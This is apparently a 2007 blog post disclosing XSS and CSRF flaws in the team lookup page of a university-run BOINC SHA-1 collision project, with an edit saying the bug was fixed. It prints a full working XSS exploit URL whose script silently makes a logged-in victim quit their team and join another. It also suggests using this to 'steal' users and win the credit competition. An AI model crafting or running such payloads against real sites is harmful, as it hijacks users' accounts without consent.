Thursday, August 23, 2007

SHA-1 Collision Search Graz XSS and CSRF

A couple of days ago, at elhacker.net, they showed a project, for finding SHA-1 collisions.
After I registered, I found out that there was a "competition" of teams, for winning credits.
http://boinc.iaik.tugraz.at/sha1_coll_search/top_teams.php

So, after checking out how it worked, I found a CSRF, and XSS at the team search engine.

So, I made a simple exploit, that will change your team to.. BOINC Confederation.

The XSS vuln, is here:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=XSS&search=Search

The CSRF vuln is in all forms..

The exploit (for firefox) is:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=%3Cscript%3Ewith(new%20XMLHttpRequest()){open(%22GET%22,%22http://boinc.iaik.tugraz.at/team_quit_form.php%22,false);send(null);x=responseText.match(/id%20value=([0-9]*)/)[1];open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_quit_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22id=%22%2Bx);open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_join_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22teamid=1%22);}%3C/script%3E&search=Search

Pretty simple :P

So, by "stealing" a user of an important team.. you can make your team win, the list of the top users is here:
http://boinc.iaik.tugraz.at/top_users.php

Greetz!!

--EDIT--
The bug has been fixed :) is good to see that someone actually reads my blog xD